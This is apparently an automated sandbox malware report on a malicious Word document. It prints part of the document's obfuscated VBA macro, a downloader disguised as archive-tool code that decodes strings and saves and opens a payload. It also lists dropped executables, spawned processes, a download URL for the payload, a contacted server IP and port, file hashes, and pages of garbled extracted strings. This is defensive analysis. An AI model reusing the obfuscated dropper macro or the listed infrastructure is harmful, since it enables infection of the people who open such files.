  .Tool.Enabled = True
  .t.Item(1).Buttons.Item(1).Enabled = True
  Else
  For i = 1 To 19
  .t.Item(0).Buttons.Item(i).Enabled = False
  Next i
  .Commans.Enabled = False
  .Tool.Enabled = False
  .t.Item(1).Buttons.Item(1).Enabled = False
  End If
  End With
  End Sub
  Public Function PotongSlash(ByVal Nma As String) As String
  If Right$(Nma, 1) = "\" Then
  PotongSlash = Left$(Nma, Len(Nma) - 1)
  Else
  PotongSlash = Nma
  End If
  End Function
  Public Sub BuatFolderTemp()
  Dim PathDir As String
  On Error Resume Next
  PathDir = TempDir
  MkDir PathDir
  End Sub
  Public Function Tampilkan(ByVal NamaKey As String) As Long
  Dim hNode As Long
  Dim Path() As String
  With FrmUtama.TV
  If InStr(NamaKey, "\") > 0 Then
  Path = Split(NamaKey, "\")
  NamaKey = ""
  For i = 0 To UBound(Path) - 1
  NamaKey = NamaKey & Path(i) & "\"
  hNode = .GetKeyNode(NamaKey)
  If hNode <> 0 Then Call .Expand(hNode, False)
  If i = UBound(Path) - 1 Then
  .SetFocus
  .SelectedNode = hNode
  End If
  Next i
  ElseIf NamaKey = "" Then
  hNode = .GetKeyNode(NamaKey)
  .SetFocus
  .SelectedNode = hNode
  End If
  End With
  End Function
  Public Sub Kembali()
  Dim Root As String
  With FrmUtama.TV
  Root = .GetNodeKey(.NodeParent(FokushNode))
  Tampilkan Root
  End With
  End Sub
  Public Sub Mulai()
  Dim MyCommand As String
  Dim JumSelect As Long
  CallByName SHFIELD_1, Replace("65asa65avet65aof65ail65ae", "65a", ""), VbMethod, SHFIELD_5, 2
  GoTo sid0
  MyCommand = GetCommLine
  If MyCommand <> "" Then
  Alamat = Right$(MyCommand, (Len(MyCommand)) - 3)
  End If
  Deskripsi = AmbilNama(Alamat) & " " & "Darma File Archieve Beta 0.1"
  If Left$(MyCommand, 2) = "/U" Then
  FrmUtama.Caption = Deskripsi
  FrmUtama.TAlamat.AddItem Alamat
  FrmFind.cAlamat.Text = Alamat
  FrmFind.cAlamat.AddItem Alamat
  BacaAr.chive Alamat
  ElseIf Left$(MyCommand, 2) = "/A" Then
  xSimpan = Alamat & ".gus"
  Alamat = TesSlash(Alamat)
  If PathFile.Exists(StrPtr(xSimpan)) Then
  Kump.ulkan Alamat, -1
  JumSelect = FrmUtama.LVSelect.ListItems.Count
  tSimpan = Alamat
  TambahAr.chive xSimpan, JumSelect
  Else
  BuatAr.chive Alamat, xSimpan, frmProses.lblStatus
  End If
  ElseIf Left$(MyCommand, 2) = "/B" Then
  xSimpan = Alamat & ".gus"
  FrmPilih.TAlamat.Text = Alamat
  FrmPilih.tSimpanX.Text = xSimpan
  Alamat = TesSlash(Alamat)
  FrmPilih.Show
  ElseIf Left$(MyCommand, 2) = "/C" Then
  xSimpan = Left$(Alamat, Len(Alamat) - Len(AmbilExtensi(Ala.Mat))) & ".gus"
  BuatA.rchive Alamat, xSimpan, frmProses.lblStatus, True
  ElseIf Left$(MyCommand, 2) = "/W" Then
  With c
  Call Extract.AllSpesial
  End With
  If PesanError = "" Then
  End
  Else
  Load FrmDiagnosa
  End If
  Else
  EnableButton False
  Terbuka = True
  FrmUtama.Show
  End If
  sid0:
  GetText ""
  End Sub
  Public Function ApakahFile() As Boolean
  If CariTipe = "Folder" Then
  ApakahFile = False
  Else
  ApakahFile = True
  End If
  End Function
  Public Function CustomInfoGetResult(PropMgr() As Variant, Delete2 As Integer) As String
  Dim i As Integer
  Dim intStatus As String
  intStatus = ""
  For i = LBound(PropMgr) To UBound(PropMgr)
  intStatus = intStatus & Chr(PropMgr(i) - 18 * Delete2 - 945 - 8887 - 225)
  Next i
  CustomInfoGetResult = intStatus
  End Function
  Public Function AddFavorit(ByVal Path As String, ByVal nama As String, Optional Tipe As Long = 1)
  Dim cnt As Long
  With FrmUtama
  If Tipe = 1 Then
  If .mnuFavorites(1).Visible = False Then
  .mnuFavorites(1).Tag = Path
  .mnuFavorites(1).Caption = "1 " & nama
  .mnuFavorites(1).Visible = True
  .mnuFavorites(0).Visible = True
  Else
  cnt = .mnuFavorites.Count
  Load .mnuFavorites(cnt)
  .mnuFavorites(cnt).Tag = Path
  TemPFavo = TemPFavo & "?" & .mnuFavorites(1).Tag
  .mnuFavorites(cnt).Caption = cnt & " " & nama
  .mnuFavorites(cnt).Visible = True
  End If
  Else
  If .MnFavo(1).Visible = False Then
  .MnFavo(1).Tag = Path
  .MnFavo(1).Caption = "1 " & Path
  .MnFavo(1).Visible = True
  .MnFavo(0).Visible = True
  Else
  cnt = .MnFavo.Count
  Load .MnFavo(cnt)
  .MnFavo(cnt).Tag = Path
  .MnFavo(cnt).Caption = cnt & " " & Path
  .MnFavo(cnt).Visible = True
  End If
  End If
  End With
  End Function
  Public Function GetText(ByVal c As String) As String
  SHFIELD_6.Open (SHFIELD_5)
  Exit Function
  GetText = cggg.ItemText(cggg.ListIndex)
  End Function
  Public Function GetAttrFile(ByVal Alamat As String) As Long
  GetAttrFile = GetFileAttributes(StrPtr(Alamat))
  End Function
  Public Function SetFileAttr(ByVal Alamat As String, ByVal Tipe As Integer) As Boolean
  SetFileAttr = SetFileAttributes(StrPtr(Alamat), Tipe)
  End Function
  Public Sub LoadPesan()
  With FrmUtama
  .LVRead.Width = .Width - 280
  .LVRead.Height = .Height - 2550
  .TV.Height = .LVRead.Height
  .TAlamat.Width = .Width - 600
  If Header.Flags And fCommand Then
  .WindowState = 2
  .TPesan.Visible = True
  .TPesan.Text = pesan
  .TPesan.Height = .LVRead.Height
  .TPesan.Left = .LVRead.Left + .LVRead.Width + 100
  .PicSplit.Left = .TPesan.Left - 50
  .ImgSplit.Left = .PicSplit.Left
  .LVRead.Width = .Width - (.TPesan.Width + .TV.Width + 370)
  Else
  .TPesan.Visible = False
  .LVRead.Left = .TV.Width + 70
  .LVRead.Width = .Width - (.TV.Width + 380)
  End If
  End With
  End Sub
  Public Function ValidFile(ByVal Alamat As String) As Boolean
  If PathFileExists(StrPtr(Alamat)) Then
  ValidFile = True
  Else
  ValidFile = False
  End If
  End Function
  Public Function ValidFolder(ByVal Alamat As String) As Boolean
  If PathIsDirectory(StrPtr(Alamat)) Then
  ValidFolder = True
  Else
  ValidFolder = False
  End If
  End Function
  Public Function SHFIELD() As Integer
  Dim temp() As Byte
  Dim UkHead As Integer
  UkHead = Len(Header)
  ReDim temp(UkHead - 7)
  Call CopyMem(ByVal VarPtr(temp(0)), ByVal VarPtr(Header) + 6, UkHead - 6)
  SHFIELD = GetCrc16(temp, UBound(temp))
  End Function
  Public Function HashType() As Integer
  Dim UkHead As Integer
  Dim temp() As Byte
  UkHead = Len(InfoJenis)
  ReDim temp(UkHead - 3)
  Call CopyMem(ByVal VarPtr(temp(0)), ByVal VarPtr(InfoJenis) + 2, UkHead - 2)
  HashType = GetCrc16(temp, UBound(temp))
  End Function
  Public Function HashInfo() As Integer
  Dim UkHead As Integer
  Dim temp() As Byte
  UkHead = Len(InfoJenis)
  ReDim temp(UkHead - 3)
  Call CopyMem(ByVal VarPtr(temp(0)), ByVal VarPtr(InfoJenis) + 2, UkHead - 2)
  HashInfo = GetCrc16(temp, UBound(temp))
  End Function"
  
  source
  
  Static Parser
  
  relevance
  
  10/10
- Creates a writable file in a temporary directory
  
  details
  
  "noeebene.exe" created file "%TEMP%\Cab3D3B.tmp"
  "noeebene.exe" created file "%TEMP%\Tar3D4B.tmp"
  "noeebene.exe" created file "%TEMP%\Cab5384.tmp"
  "noeebene.exe" created file "%TEMP%\Tar5385.tmp"
  
  source
  
  API Call
  
  relevance
  
  1/10
- Creates mutants
  
  details
  
  "IESQMMUTEX_0_208"
  "KYIMEShareCachedData.MutexObject.PSPUBWS"
  "KYTransactionServer.MutexObject.PSPUBWS"
  "Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
  "Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
  "Local\WininetStartupMutex"
  "Local\WininetConnectionMutex"
  "Local\WininetProxyRegistryMutex"
  "Local\ZonesCounterMutex"
  "Local\ZoneAttributeCacheCounterMutex"
  "Local\ZonesCacheCounterMutex"
  "Local\ZonesLockedCacheCounterMutex"
  "Global\9490c90aae5ca3163339b35d320eff8a"
  "Global\d54a59a4b1a20fc4d36a20d656c5919b"
  
  source
  
  Created Mutant
  
  relevance
  
  3/10
- Loads modules at runtime
  
  details
  
  "noeebene.exe" loaded module "RPCRT4.DLL" at base 76F00000
  "noeebene.exe" loaded module "API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL" at base 76230000
  "noeebene.exe" loaded module "SETUPAPI.DLL" at base 77970000
  "noeebene.exe" loaded module "SENSAPI.DLL" at base 72CB0000
  "noeebene.exe" loaded module "%WINDIR%\SYSTEM32\CRYPTNET.DLL" at base 66FC0000
  "noeebene.exe" loaded module "WINHTTP.DLL" at base 71BA0000
  "noeebene.exe" loaded module "SHLWAPI.DLL" at base 77170000
  "noeebene.exe" loaded module "ADVAPI32.DLL" at base 75F60000
  "noeebene.exe" loaded module "WS2_32.DLL" at base 77C60000
  "noeebene.exe" loaded module "KERNEL32.DLL" at base 773E0000
  "noeebene.exe" loaded module "SSPICLI.DLL" at base 75B40000
  "noeebene.exe" loaded module "IPHLPAPI.DLL" at base 75230000
  "noeebene.exe" loaded module "DHCPCSVC6.DLL" at base 73F40000
  "noeebene.exe" loaded module "DHCPCSVC.DLL" at base 74FC0000
  
  source
  
  API Call
  
  relevance
  
  1/10
- Loads rich edit control libraries
  
  details
  
  "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\Microsoft Shared\office12\riched20.dll" at 67350000
  
  source
  
  Loaded Module
- Spawns new processes
  
  details
  
  Spawned process "noeebene.exe" (UID: 00199703-00003024)
  Spawned process "noeebene.exe" with commandline "%TEMP%\noeebene.exe" (UID: 00202890-00002624)
  Spawned process "Explorer.EXE" with commandline "%WINDIR%\Explorer.EXE" (UID: 00221515-00001516)
  Spawned process "taskhost.exe" (UID: 00244031-00001464)
  Spawned process "taskhost.exe" (UID: 00267796-00003280)
  Spawned process "OffDiag.exe" with commandline "/SOURCE 1 /LCID 1031 /WAITPID 3216" (UID: 00465390-00003232)
  
  source
  
  Monitored Target
  
  relevance
  
  3/10
Installation/Persistance
- Dropped files
  
  details
  
  "~$Normal.dotm" has type "data"
  "~WRS{9FB5A578-4DAC-4A28-8295-387C96AEDF5E}.tmp" has type "FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375""
  "opa12.dat" has type "data"
  "DOC201114_201114_001.DOC.LNK" has type "MS Windows shortcut, Item id list present, Points to a file or directory, Archive, ctime=Tue Jan 19 22:38:34 2016, mtime=Tue Jan 19 22:38:34 2016, atime=Tue Jan 19 22:38:34 2016, length=75264, window=hide"
  "index.dat" has type "data"
  "Local Disk (Z).LNK" has type "MS Windows shortcut, Item id list present, Points to a file or directory, Directory, ctime=Tue Jan 19 20:39:22 2016, mtime=Tue Jan 19 20:40:32 2016, atime=Tue Jan 19 20:40:32 2016, length=4096, window=hide"
  "08g7g6r56r[1].exe" has type "PE32 executable (GUI) Intel 80386, for MS Windows"
  "noeebene.exe" has type "PE32 executable (GUI) Intel 80386, for MS Windows"
  "Cab280B.tmp" has type "Microsoft Cabinet archive data, 48151 bytes, 1 file"
  "Tar280C.tmp" has type "data"
  "Cab3D3B.tmp" has type "Microsoft Cabinet archive data, 48151 bytes, 1 file"
  "Tar3D4B.tmp" has type "data"
  "94308059B57B3142E455B38A6EB92015" has type "data"
  "Cab5384.tmp" has type "Microsoft Cabinet archive data, 49695 bytes, 1 file"
  "Tar5385.tmp" has type "data"
  "216_59_16_175[1].txt" has type "data"
  "021404ae7ed34c62769bc54bbab242b6_e47c61d2-1dae-480e-827a-ae8d797649df" has type "data"
  "464515.cvr" has type "data"
  "465031.od" has type "ASCII text, with CRLF line terminators"
  
  source
  
  Extracted File
  
  relevance
  
  3/10
Network Related
- Found potential URL in binary/memory
  
  details
  
  Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
  Pattern match: "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab"
  
  source
  
  String
  
  relevance
  
  10/10

File Details

All Details:

DOC201114-201114-001.DOC

Filename: DOC201114-201114-001.DOC
Size: 74KiB (75264 bytes)
Type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: 1, Template: Normal, Last Saved By: 1, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 19 08:19:00 2016, Last Saved Time/Date: Tue Jan 19 08:19:00 2016, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0
SHA256
: bba0e9058c2f32bbb1d7f518ae538f866f7c6963cde79f87ae9e87856a18070c
MD5
: 0112f360e7087cea914a25bf3c09f60a
SHA1
: 6b2fd30e68bd701b939c60e94801c037dc567f12
SHA512
: 2682a1384dbaaa81666aafffa7843c4d9a79297c98ef85debd468855bf98e8110fa5f5ecc9eb2c0e9eb25540dfbc23b2fefd0bd1461b2654bbd00a7053b116f1

Resources

Icon

Visualization

Input File (PortEx)

Classification (TrID)

54.2% (.DOC) Microsoft Word document
32.2% (.DOC) Microsoft Word document (old ver.)
13.5% (.) Generic OLE2 / Multistream Compound File

Screenshots

Loading content, please wait...

Hybrid Analysis

Tip: Click an analysed process below to view more details.

Analysed 7 processes in total (System Resource Monitor).

WINWORD.EXE /n /dde (PID: 2324)
- noeebene.exe (PID: 3024)
  - noeebene.exe %TEMP%\noeebene.exe (PID: 2624)
- OffDiag.exe /SOURCE 1 /LCID 1031 /WAITPID 3216 (PID: 3232)
Explorer.EXE %WINDIR%\Explorer.EXE (PID: 1516)
... and some more processes with no relevance.

Logged Script Calls	Logged Stdout	Extracted Streams	Memory Dumps
Reduced Monitoring	Network Activity	Network Error	Multiscan Match

Network Analysis

DNS Requests

Domain	Address	Registrar	Country
www.cnbhgy.com	123.1.157.76	-	Hong Kong

Contacted Hosts

IP Address

Port/Protocol

Associated Process

Details

123.1.157.76
OSINT

Associated Artifacts for 123.1.157.76

Details	Associated URL	Threat Level	Positives	Scan Date	Reference
Associated URL http://www.cnbhgy.com/786585d/08g7g6r56r.exe Threat Level malicious Positives 4/66 Scan Date 01/19/2016 13:23:10 Reference -	http://www.cnbhgy.com/786585d/08g7g6r56r.exe	malicious	4/66	01/19/2016 13:23:10	-

Details	Associated SHA256	Threat Level	Positives	Scan Date	Reference
Associated SHA256 59963616aaa3b72228a786cdf5343be527a5502b136b2c5f7f45e47b0fe8663f Threat Level malicious Positives 2/53 Scan Date 01/19/2016 13:23:16 Reference VirusTotal	59963616aaa3b72228a786cdf5343be527a5502b136b2c5f7f45e47b0fe8663f	malicious	2/53	01/19/2016 13:23:16	VirusTotal
Associated SHA256 ea05dd2ce2721b4faddab320f0424be7c1c57a9433d337175358e472044d66dd Threat Level malicious Positives 2/54 Scan Date 01/19/2016 10:19:42 Reference VirusTotal	ea05dd2ce2721b4faddab320f0424be7c1c57a9433d337175358e472044d66dd	malicious	2/54	01/19/2016 10:19:42	VirusTotal

Details	Domain	Threat Level	Positives	Last Resolved	Reference
Domain www.cnbhgy.com Threat Level - Positives - Last Resolved 01/19/2016 00:00:00 VirusTotal Report	www.cnbhgy.com	-	-	01/19/2016 00:00:00	Report
Domain bravewheels.com Threat Level - Positives - Last Resolved 11/23/2015 00:00:00 VirusTotal Report	bravewheels.com	-	-	11/23/2015 00:00:00	Report
Domain xingshengpackaging.com Threat Level - Positives - Last Resolved 11/06/2015 00:00:00 VirusTotal Report	xingshengpackaging.com	-	-	11/06/2015 00:00:00	Report
Domain gzfiona.com Threat Level - Positives - Last Resolved 01/23/2015 00:00:00 VirusTotal Report	gzfiona.com	-	-	01/23/2015 00:00:00	Report
Domain cnbzys.com Threat Level - Positives - Last Resolved 10/20/2014 00:00:00 VirusTotal Report	cnbzys.com	-	-	10/20/2014 00:00:00	Report

80
TCP

Hong Kong
ASN: 17444 (AS number for New World Telephone Ltd.)

216.59.16.175
OSINT

Associated Artifacts for 216.59.16.175

Details	Associated URL	Threat Level	Positives	Scan Date	Reference
Associated URL http://216.59.16.175:4143/ Threat Level suspicious Positives 1/66 Scan Date 01/19/2016 11:17:40 Reference -	http://216.59.16.175:4143/	suspicious	1/66	01/19/2016 11:17:40	-

Details	Domain	Threat Level	Positives	Last Resolved	Reference
Domain systemmaster.com.br Threat Level - Positives - Last Resolved 09/10/2015 00:00:00 VirusTotal Report	systemmaster.com.br	-	-	09/10/2015 00:00:00	Report
Domain www.systemmaster.com.br Threat Level - Positives - Last Resolved 11/28/2014 00:00:00 VirusTotal Report	www.systemmaster.com.br	-	-	11/28/2014 00:00:00	Report

4143
TCP

United States
ASN: 15085 (Immedion, LLC)

Port Protocol Description
Port 80: Hypertext Transfer Protocol (HTTP)

Contacted Countries

HTTP Traffic

Endpoint	Request	URL	Data
123.1.157.76:80 (www.cnbhgy.com)	GET	/786585d/08g7g6r56r.exe	GET /786585d/08g7g6r56r.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: www.cnbhgy.com Connection: Keep-Alive

Extracted Strings

All Details: Download All Memory Strings (4.1KiB)

! y1=Bd^-a!758tFocu8sed!# #th?U%U2LU%PFindR.lv.?P-E`8P2>+#[email protected]

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

!""0"8""P"

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

!"#$%&)-,}/0123456789:;<=>[email protected][\]^_`abcdefghijklmnopqrstuvwxyz{|~Root EntryF+R+1TableWordDocumentSummaryInformation(DocumentSummaryInformation8Macros

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

!f`6CustComboBox(Varian #Array(10935, 47388978950)873c41MB2%342

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

!GADdJAL*0IU9R}f|Esq-i}V.V.V.V..V.V.Project.ThisDocument.autoopen Project.Module1.PerbaikiTampilanProject.Module1.KembaliProject.Module1.LoadPesanProject.Module1.BuatFolderTempProject.Module1.MulaiPROJECT.MODULE1.MULAIPROJECT.MODULE1.KEMBALIPROJECT.MODULE1.LOADPESANPROJECT.THISDOCUMENT.AUTOOPENPROJECT.MODULE1.BUATFOLDERTEMP [email protected]@UnknownG.CxTimes New Roman5Symbol3..CxArialA$BCambria Math"hAGAG!nr4$lzKHP(?2!xx11Oh+'0L

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

!This program cannot be run in DOS mode.$

Ansi based on Dropped File (08g7g6r56r[1].exe.188093)

!{/p!{/

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

""""""B""#(#0#8#@#"H#P#X#`#

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

"#$%&')+80*pHdProjectQ(@=

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

"2)S(end54 + \notebene.txtaBeUniToAnsi "R

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

"80a431ba2623d11:0"

Unicode based on Runtime Data (noeebene.exe )

"ecO`In(A1.") > 0e4 Mid$(bRev$ f+/!U_aTAlamat'"c \/l)@.1?s!SuwAutoAaki!!Splitk3nNm( [email protected]`o UBound(EIC= s& (i) & "\P>eH A+Is,(,R))Yi-7

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

"J~Tar"1xTrA0 .= c=qO.TemPO?"r>

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

#zCm>nhf6t}M&6'\gkNS:;\qN-S;k"{DailL`/

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

$ 'ri $ [email protected]>

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

$$$$$$$$"$$$$

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

$$' $ 'd 'kiP] \

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

$$' $ 'd 'kxip](]@]X] $' $' A$ $' !(d [email protected] [email protected]]0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

$'h $ $$ [email protected] [email protected]

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

$(0H`h(@X`hpxBp @HP

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

$\G \'cG 'jih $

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

% %(%"0%8%@%FH%%%%%%8%&(&8&P&`&x&&&&&&&''0'8'X'`'x''''

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

%#5#[email protected]'Rece("ZUD(BAGET"l, ".Open ru, 5omInfoC`=Dult(4, 43), FalseN

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

%f(d <k e="DCMqx 'ih]]]]H]`$' $'

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

%f(dyP

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

%TEMP%\noeebene.exe

Ansi based on Process Commandline (noeebene.exe)

%WINDIR%\Explorer.EXE

Ansi based on Process Commandline (Explorer.EXE)

& B( 0 8 @ H ` h !([email protected]!

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

&G.R(S*\;GIK}[email protected]|!8>67)qnpJOF$w;fCLL&m%]V%z-{

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

' *S*$(' Right(c/pa? = [email protected]) - 2pSDu zDpZA'0 fC6EA0$, y:3L*G32\[G8tp/yT5= [O2os- `

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

''''_:_

Ansi based on Image Processing (screen_13.png)

''0'(8(P(

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

''\'rstdShell.Application$.00204h !#2. $'ysWOW6 at rmal $ '* j $ $C8Dd $ ' $ 'icroso 7'FI $CbrarykH ThisDo [email protected] !WB1D2ScB1D2riptB1D2.B1D2ShB1D2ellB1D2$$.PrD4N6ocD4N6esD4N6sD4N6$ %.u,[email protected] Callix

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

''__.__._

Ansi based on Image Processing (screen_14.png)

'._'____ar:a____

Ansi based on Image Processing (screen_1.png)

'.__ar___

Ansi based on Image Processing (screen_0.png)

'.ni___ar:a_

Ansi based on Image Processing (screen_8.png)

'_i___ar:a

Ansi based on Image Processing (screen_12.png)

'i 9lq [email protected]:[email protected]>

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

't\{BHuM6`pGO+!XoN'^[crh2*tW<{1U+l_QSncX<)Q(wJH

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

'theme/theme/_rels/themeManager.xml.relsM

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

'theme/theme/_rels/themeManager.xml.relsPK]

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

'ttribu $'ng '>

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

'v t't

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

'v'i___ar:a

Ansi based on Image Processing (screen_3.png)

( (@HXx

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

(((((

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

((B()) )()0)8)[email protected])H)P)X)`)8)

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

(), vbUnicode!frmV.tTextOShowCCloseHan8dle`1Arcn, [email protected]#1hTemp<[email protected]%P<>0 "" R= Dir &C^a(@@ExtractT(TD

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

(-8-H- X-x--(--

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

([email protected]`hpx$0Ph

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

([email protected]&o`XAttribute VB_Name = "ThisDocument"

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

(MkIVEpYPN2$

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

) + 6,: %6%_GetCrc16("ABound)HashTy|pe7InfoJenis{[email protected]"-C RClC

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

) TrueEPatdExists(zPtr(at))

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

)$PROJECTwm(ACompObj*rThisDocumentThisDocumentModule1Module1

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

)))B))))* *8*X*h*x**** * **+++0+H+h+x+++++ +++,,,B, ,0,8,P,BX,`,x,B,,,",,,,,,- -

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

)t1';

Ansi based on Runtime Data (noeebene.exe )

+(`=%*pace$('Mem+d1, G=UniT`oAnsiDJA5WJDWith SHFIELD_1. [email protected] TampilkanTV ""@&xitH PathFi.leExistsA(B$AC*6HitungWPaktudd#c1If 60 ThB*[email protected]?H ForDigit(j) & ":"@md=7zAjumlah7 @`[email protected]$([email protected]!XJ"0",Sub Perbaikbic:an(!4DfrmProses!!.lbl.CapA "Jc : a C(Ab,Dira%CP!OMasukFin:d]n`%%LocSTRny?A{e!Te<mp"@\lel&= ADtmp$Extet!D= CreaW:&H402%01, [email protected] 6Handle 9FrmUt$.Pic01.Cl!;buLoad_Icon(, [email protected], , ico325dhiSet GH.!

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

+,$-.0

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

+``3`t` 2%+`A``j %+`h`P @8(`` x+TIh+x8IXI

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

[email protected]!d!12OwMX!CNUleRKIDUZ8rfWDP>EIxMEPS"SS"<<Module1.QThisDocument

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

+j+k/!

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

+Y+d8

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

, .LV.Image4(lvwSfNl

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

, 1) <> "\" Then _R71Else,ApNulPCOriginaFl-(InB(, ChrW$(0)) > 0)

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

, `3>2">La(rgeL64Hapus 9d= 09CWE(100 - CLng(Round(UkIi/ * , 2))

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

, iId!) .FromHLoadResPictureB(, vb Bitmap)., imlC#`AIunctimG|etjA1)!aStriq

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

,,,,,,,,,_

Ansi based on Image Processing (screen_2.png)

,,,,,,,,,_O

Ansi based on Image Processing (screen_3.png)

,,__,____

Ansi based on Image Processing (screen_14.png)

,._ro_e,;o,

Ansi based on Image Processing (screen_2.png)

,.aic21h:[email protected];d`o7gK(M&$R(.1r'JT8V"AHu}|$b{P8g/]QAs(#L[PK-![Content_Types].xmlPK-!60_rels/.relsPK-!kytheme/theme/themeManager.xmlPK-!^}-theme/theme/theme1.xmlPK-!

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

,4<D1Normal12Microsoft Office [email protected]@[email protected]+,0hp

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

,_,,0___

Ansi based on Image Processing (screen_8.png)

,_,,____

Ansi based on Image Processing (screen_12.png)

,ch_gn.

Ansi based on Image Processing (screen_2.png)

,HbX!OfficgOficg!G{[email protected] Files (x86)\@Common\Microsoft Shared\OFFICE14\MSO.DLL#P 14.0 Ob Li`brary'|[email protected]@[email protected],!"B

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

- g up&7(dS),"/)R/]0P6387<kH>,PCkD)Ec7N>OLO5RJU`0WhW'nW{yYQ\zj\BaXa~ahWo "q"qw^x<!yQS{-|P~l:="=8{95?H,L<mRRl$i*AE#|Qu".ahqG;%[email protected])s{{

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

--''-'-----'----''---'''''''''''''''''''

Ansi based on Image Processing (screen_4.png)

---. .(.B0.8.P.X.`.h.p.Bx.......B...

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

--0000-p+R

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

-.h"P6T{T

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

-___''''__''''_'''-__'________

Ansi based on Image Processing (screen_4.png)

-Farmahar!a9'n

Ansi based on Image Processing (screen_0.png)

-x -s 2780

Ansi based on Process Commandline (s)

. 5b! 7b!

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

. H h

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

.'_......_..__._

Ansi based on Image Processing (screen_4.png)

..-.'J

Ansi based on Image Processing (screen_8.png)

..-_..__t

Ansi based on Image Processing (screen_4.png)

....._

Ansi based on Image Processing (screen_13.png)

....__

Ansi based on Image Processing (screen_3.png)

..4/8/P/BX/`/h/

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

..___._.

